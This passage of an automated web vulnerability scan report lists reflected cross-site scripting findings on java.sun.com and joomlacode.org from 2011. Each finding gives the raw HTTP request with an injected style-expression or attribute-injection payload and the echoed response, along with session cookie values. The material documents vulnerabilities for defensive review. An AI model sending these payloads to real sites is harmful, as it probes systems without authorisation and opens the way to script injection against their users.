This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/plugin/2cda2"style%3d"x%3aexpression(alert(1))"ceeb973e53 HTTP/1.1
Host: java.sun.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Tue, 25 Jan 2011 15:12:00 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Sun Microsystems</title>
<!-- BEGIN METADATA -->
<meta http-equiv="content-type" content="text/html; charse
...[SNIP]...
<a href="/contact/feedback.jsp?
referer=http://java.sun.com/notfound.jsp
&requrl=http://java.sun.com/products/plugin/2cda2"style="x:expression(alert(1))"ceeb973e53
&refurl=http://java.sun.com/UserTypedUrl
&category=se">
...[SNIP]...

4.112. http://java.sun.com/products/plugin/autodl/jinstall-1_4_2-windows-i586.cab [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://java.sun.com
Path:   /products/plugin/autodl/jinstall-1_4_2-windows-i586.cab

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6036f"style%3d"x%3aexpression(alert(1))"1d04adb81fe was submitted in the REST URL parameter 1. This input was echoed as 6036f"style="x:expression(alert(1))"1d04adb81fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products6036f"style%3d"x%3aexpression(alert(1))"1d04adb81fe/plugin/autodl/jinstall-1_4_2-windows-i586.cab HTTP/1.1
Host: java.sun.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Tue, 25 Jan 2011 15:10:36 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Sun Microsystems</title>
<!-- BEGIN METADATA -->
<meta http-equiv="content-type" content="text/html; charse
...[SNIP]...
<a href="/contact/feedback.jsp?
referer=http://java.sun.com/notfound.jsp
&requrl=http://java.sun.com/products6036f"style="x:expression(alert(1))"1d04adb81fe/plugin/autodl/jinstall-1_4_2-windows-i586.cab
&refurl=http://java.sun.com/UserTypedUrl
&category=se">
...[SNIP]...

4.113. http://java.sun.com/products/plugin/autodl/jinstall-1_4_2-windows-i586.cab [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://java.sun.com
Path:   /products/plugin/autodl/jinstall-1_4_2-windows-i586.cab

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f027"style%3d"x%3aexpression(alert(1))"82c3e87f4db was submitted in the REST URL parameter 2. This input was echoed as 3f027"style="x:expression(alert(1))"82c3e87f4db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/plugin3f027"style%3d"x%3aexpression(alert(1))"82c3e87f4db/autodl/jinstall-1_4_2-windows-i586.cab HTTP/1.1
Host: java.sun.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Tue, 25 Jan 2011 15:10:20 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Sun Microsystems</title>
<!-- BEGIN METADATA -->
<meta http-equiv="content-type" content="text/html; charse
...[SNIP]...
<a href="/contact/feedback.jsp?
referer=http://java.sun.com/notfound.jsp
&requrl=http://java.sun.com/products/plugin3f027"style="x:expression(alert(1))"82c3e87f4db/autodl/jinstall-1_4_2-windows-i586.cab
&refurl=http://java.sun.com/UserTypedUrl
&category=se">
...[SNIP]...

4.114. http://java.sun.com/products/plugin/autodl/jinstall-1_4_2-windows-i586.cab [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://java.sun.com
Path:   /products/plugin/autodl/jinstall-1_4_2-windows-i586.cab

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 754e0"style%3d"x%3aexpression(alert(1))"fe88d234451 was submitted in the REST URL parameter 3. This input was echoed as 754e0"style="x:expression(alert(1))"fe88d234451 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/plugin/754e0"style%3d"x%3aexpression(alert(1))"fe88d234451/jinstall-1_4_2-windows-i586.cab HTTP/1.1
Host: java.sun.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Tue, 25 Jan 2011 15:10:53 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Sun Microsystems</title>
<!-- BEGIN METADATA -->
<meta http-equiv="content-type" content="text/html; charse
...[SNIP]...
<a href="/contact/feedback.jsp?
referer=http://java.sun.com/notfound.jsp
&requrl=http://java.sun.com/products/plugin/754e0"style="x:expression(alert(1))"fe88d234451/jinstall-1_4_2-windows-i586.cab
&refurl=http://java.sun.com/UserTypedUrl
&category=se">
...[SNIP]...

4.115. http://joomlacode.org/gf/account/ [redirect parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://joomlacode.org
Path:   /gf/account/

Issue detail

The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32b15"%20a%3db%2094a4ff668b0 was submitted in the redirect parameter. This input was echoed as 32b15" a=b 94a4ff668b0 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gf/account/?action=Login&redirect=%2Fgf%2Fproject%2Fjoomla%2Freporting%2F32b15"%20a%3db%2094a4ff668b0 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:03:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9533


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
<input type="hidden" name="redirect" value="/gf/project/joomla/reporting/32b15" a=b 94a4ff668b0" />
...[SNIP]...

4.116. http://joomlacode.org/gf/project/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6c95"style%3d"x%3aexpression(alert(1))"a2a3aa10cec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d6c95"style="x:expression(alert(1))"a2a3aa10cec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/?d6c95"style%3d"x%3aexpression(alert(1))"a2a3aa10cec=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:38:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43816


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
<a class="quickJumpMenu" href="/gf/project/?action=&amp;d6c95"style="x:expression(alert(1))"a2a3aa10cec=1&amp;project_limit=5">
...[SNIP]...

4.117. http://joomlacode.org/gf/project/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 57b13'style%3d'x%3aexpression(alert(1))'4d30efc0df0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 57b13'style='x:expression(alert(1))'4d30efc0df0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/?57b13'style%3d'x%3aexpression(alert(1))'4d30efc0df0=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:38:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43816


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
roject_PROJECT_NAME_img"].src="/themes/gforge5/images/arrow_up.gif"' onMouseOut='document["projectproject_PROJECT_NAME_img"].src="/themes/gforge5/images/arrow_down.gif"' href='/gf/project/?action=&amp;57b13'style='x:expression(alert(1))'4d30efc0df0=1&amp;projectsort_by=project.PROJECT_NAME&amp;projectsort_order=asc' />
...[SNIP]...

4.118. http://joomlacode.org/gf/project/com_joodater/news/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/com_joodater/news/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e6731'style%3d'x%3aexpression(alert(1))'526aca74341 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e6731'style='x:expression(alert(1))'526aca74341 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/com_joodater/news/?e6731'style%3d'x%3aexpression(alert(1))'526aca74341=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:34:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19209


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
_POST_DATE_img"].src="/themes/gforge5/images/arrow_up.gif"' onMouseOut='document["newsnews_POST_DATE_img"].src="/themes/gforge5/images/arrow_down.gif"' href='/gf/project/com_joodater/news/?action=&amp;e6731'style='x:expression(alert(1))'526aca74341=1&amp;newssort_by=news.POST_DATE&amp;newssort_order=asc' />
...[SNIP]...

4.119. http://joomlacode.org/gf/project/com_joodater/news/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/com_joodater/news/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d560d"style%3d"x%3aexpression(alert(1))"9bcca7c27f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d560d"style="x:expression(alert(1))"9bcca7c27f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/com_joodater/news/?d560d"style%3d"x%3aexpression(alert(1))"9bcca7c27f3=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:34:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19209


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
<a class="quickJumpMenu" href="/gf/project/com_joodater/news/?action=&amp;d560d"style="x:expression(alert(1))"9bcca7c27f3=1&amp;__gads=ID%3D9359d8f79e15ae5a%3AT%3D1295919318%3AS%3DALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg&amp;__utmz=13354156.1295919321.1.1.utmcsr%3Dburp%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%
...[SNIP]...

4.120. http://joomlacode.org/gf/project/feedgator/frs/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/feedgator/frs/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bffa0"style%3d"x%3aexpression(alert(1))"cfbd9ee172b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bffa0"style="x:expression(alert(1))"cfbd9ee172b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/feedgator/frs/?bffa0"style%3d"x%3aexpression(alert(1))"cfbd9ee172b=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:39:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25946


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
<a class="quickJumpMenu" href="/gf/project/feedgator/frs/?action=&amp;bffa0"style="x:expression(alert(1))"cfbd9ee172b=1&amp;__gads=ID%3D9359d8f79e15ae5a%3AT%3D1295919318%3AS%3DALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg&amp;__utmz=13354156.1295919321.1.1.utmcsr%3Dburp%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%
...[SNIP]...

4.121. http://joomlacode.org/gf/project/feedgator/frs/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/feedgator/frs/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fc19e'style%3d'x%3aexpression(alert(1))'505c176eb8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fc19e'style='x:expression(alert(1))'505c176eb8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/feedgator/frs/?fc19e'style%3d'x%3aexpression(alert(1))'505c176eb8a=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:40:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25946


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
ackage_name_img"].src="/themes/gforge5/images/arrow_up.gif"' onMouseOut='document["br_pkgrlspackage_name_img"].src="/themes/gforge5/images/arrow_down.gif"' href='/gf/project/feedgator/frs/?action=&amp;fc19e'style='x:expression(alert(1))'505c176eb8a=1&amp;br_pkgrlssort_by=package_name&amp;br_pkgrlssort_order=asc' />
...[SNIP]...

4.122. http://joomlacode.org/gf/project/feedgator/news/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/feedgator/news/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 27f9c'style%3d'x%3aexpression(alert(1))'a61287d2c0e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 27f9c'style='x:expression(alert(1))'a61287d2c0e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/feedgator/news/?27f9c'style%3d'x%3aexpression(alert(1))'a61287d2c0e=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:38:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34213


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
ews_POST_DATE_img"].src="/themes/gforge5/images/arrow_up.gif"' onMouseOut='document["newsnews_POST_DATE_img"].src="/themes/gforge5/images/arrow_down.gif"' href='/gf/project/feedgator/news/?action=&amp;27f9c'style='x:expression(alert(1))'a61287d2c0e=1&amp;newssort_by=news.POST_DATE&amp;newssort_order=asc' />
...[SNIP]...

4.123. http://joomlacode.org/gf/project/feedgator/news/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/feedgator/news/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f59f"style%3d"x%3aexpression(alert(1))"bb796709e03 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3f59f"style="x:expression(alert(1))"bb796709e03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/feedgator/news/?3f59f"style%3d"x%3aexpression(alert(1))"bb796709e03=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:38:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34213


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
<a class="quickJumpMenu" href="/gf/project/feedgator/news/?action=&amp;3f59f"style="x:expression(alert(1))"bb796709e03=1&amp;__gads=ID%3D9359d8f79e15ae5a%3AT%3D1295919318%3AS%3DALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg&amp;__utmz=13354156.1295919321.1.1.utmcsr%3Dburp%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%
...[SNIP]...

4.124. http://joomlacode.org/gf/project/imgttfmenu/news/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/imgttfmenu/news/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94e9a"style%3d"x%3aexpression(alert(1))"8d8684829a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 94e9a"style="x:expression(alert(1))"8d8684829a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/imgttfmenu/news/?94e9a"style%3d"x%3aexpression(alert(1))"8d8684829a5=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:34:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25441


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
<a class="quickJumpMenu" href="/gf/project/imgttfmenu/news/?action=&amp;94e9a"style="x:expression(alert(1))"8d8684829a5=1&amp;__gads=ID%3D9359d8f79e15ae5a%3AT%3D1295919318%3AS%3DALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg&amp;__utmz=13354156.1295919321.1.1.utmcsr%3Dburp%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%
...[SNIP]...

4.125. http://joomlacode.org/gf/project/imgttfmenu/news/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/imgttfmenu/news/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4f7bf'style%3d'x%3aexpression(alert(1))'1597b2bf2b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4f7bf'style='x:expression(alert(1))'1597b2bf2b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/imgttfmenu/news/?4f7bf'style%3d'x%3aexpression(alert(1))'1597b2bf2b0=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:34:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25441


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
ws_POST_DATE_img"].src="/themes/gforge5/images/arrow_up.gif"' onMouseOut='document["newsnews_POST_DATE_img"].src="/themes/gforge5/images/arrow_down.gif"' href='/gf/project/imgttfmenu/news/?action=&amp;4f7bf'style='x:expression(alert(1))'1597b2bf2b0=1&amp;newssort_by=news.POST_DATE&amp;newssort_order=asc' />
...[SNIP]...

